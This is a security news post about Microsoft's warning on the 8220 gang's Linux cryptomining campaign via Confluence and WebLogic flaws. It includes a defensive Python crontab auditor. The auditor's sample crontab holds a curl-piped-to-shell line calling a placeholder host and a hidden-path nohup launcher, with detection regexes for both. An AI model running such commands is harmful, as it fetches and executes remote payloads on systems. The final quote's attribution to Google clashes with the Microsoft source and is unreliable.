Tuesday, October 15, 2024

Microsoft warning: This malware that targets Linux just got a big update


Microsoft has issued a warning about recent attempts by the “8220” malware group to break into Linux systems and set up cryptomining software. Microsoft says it has observed “notable changes” in the malware the group uses to install cryptominers on Linux systems.


Microsoft has called out the so-called “8220 gang” for recent activity found to be exploiting the critical vulnerability affecting Atlassian Confluence Server and Data Center, tracked as CVE-2022-26134.

“Over the last year, the organisation has actively upgraded its payloads and procedures. The most recent campaign employs RCE vulnerabilities for CVE-2022-26134 (Confluence) and CVE-2019-2725 (WebLogic) to get access to i686 and x86_64 Linux computers, respectively,” according to Microsoft’s Security Intelligence Centre.

Microsoft issued a warning: “The upgrades install new versions of a cryptominer and an IRC bot and make use of an exploit for a newly reported vulnerability.”


Security company Check Point found the 8220 gang using the Atlassian vulnerability to install malware on Linux machines within a week of Atlassian’s disclosure of the bug on June 2. The group was also targeting Windows machines, exploiting the Atlassian bug to inject a script into a PowerShell process in memory.

Federal organisations had already been told by CISA to patch the issue by June 6 and to prohibit all internet access to the product in the meantime.


The 8220 gang is a Chinese-speaking, Monero-mining threat actor whose C2s frequently communicate over port 8220, hence the name. According to Cisco’s Talos Intelligence division, it has been active since 2017, when it was attacking corporate systems by exploiting vulnerabilities in Docker and Apache Struts2.

Microsoft says that after the 8220 gang successfully exploits CVE-2022-26134 to gain access to a system, it downloads a loader that modifies the system’s settings to turn off security services, installs a cryptominer, establishes persistence, and then scans ports on the network to find additional servers.

Because the loader deletes log files and disables security and monitoring capabilities in the cloud, Microsoft advises administrators to enable Defender for Endpoint tamper protection settings.


The loader downloads the pwnRig cryptominer (v1.41.9) and an IRC bot that takes instructions from a C2 server. It survives reboots by setting up cron jobs or scripts that run nohup (“no hangup”) commands every 60 seconds.
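The cron-based persistence described above is easy to spot in a crontab if you look for it. The following crontab auditor is an added example written for this article, not code from Microsoft or from the original post; it flags entries that fire every minute and launch a command through nohup, and also generalises slightly to catch entries that download a payload and pipe it straight into a shell. The crontab lines, host name and paths are constructed placeholders, not indicators from the article.

```python
import re
from typing import Dict, List

# Constructed sample crontab for illustration; the host and paths are
# placeholders, not indicators taken from the article.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/1 * * * * nohup /tmp/.x/run.sh >/dev/null 2>&1 &
* * * * * curl -fsSL http://placeholder.invalid/l.sh | sh
30 6 * * 1 /usr/local/bin/backup.sh
"""

# Five schedule fields followed by the command.
CRON_RE = re.compile(r"^\s*(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
# curl/wget output piped directly into sh or bash.
DOWNLOAD_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def every_minute(fields) -> bool:
    """True when all five schedule fields mean 'every minute'."""
    return all(f in ("*", "*/1") for f in fields)


def audit_crontab(text: str) -> List[Dict[str, str]]:
    """Return the crontab entries that match the persistence patterns."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        fields, cmd = m.groups()[:5], m.group(6)
        reasons = []
        if every_minute(fields) and re.search(r"\bnohup\b", cmd):
            reasons.append("every-minute nohup launcher")
        if DOWNLOAD_TO_SHELL.search(cmd):
            reasons.append("downloads and pipes payload to shell")
        if re.search(r"/tmp/\.|/dev/shm/", cmd):
            reasons.append("runs from hidden temp path")
        if reasons:
            findings.append({"line": line.strip(), "reason": "; ".join(reasons)})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"SUSPICIOUS: {f['line']}\n  -> {f['reason']}")
```

Run it against `crontab -l` output for each user and against the files under /etc/cron.d to cover system-wide entries as well.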

“The loader searches the network for additional SSH servers using the IP port scanner tool ‘masscan,’ and then propagates by using the GoLang-based SSH brute force tool ‘spirit.’ Additionally, it searches the local disc for SSH keys so that it may connect to known hosts and migrate laterally,” Google says.

IEMA IEMLabs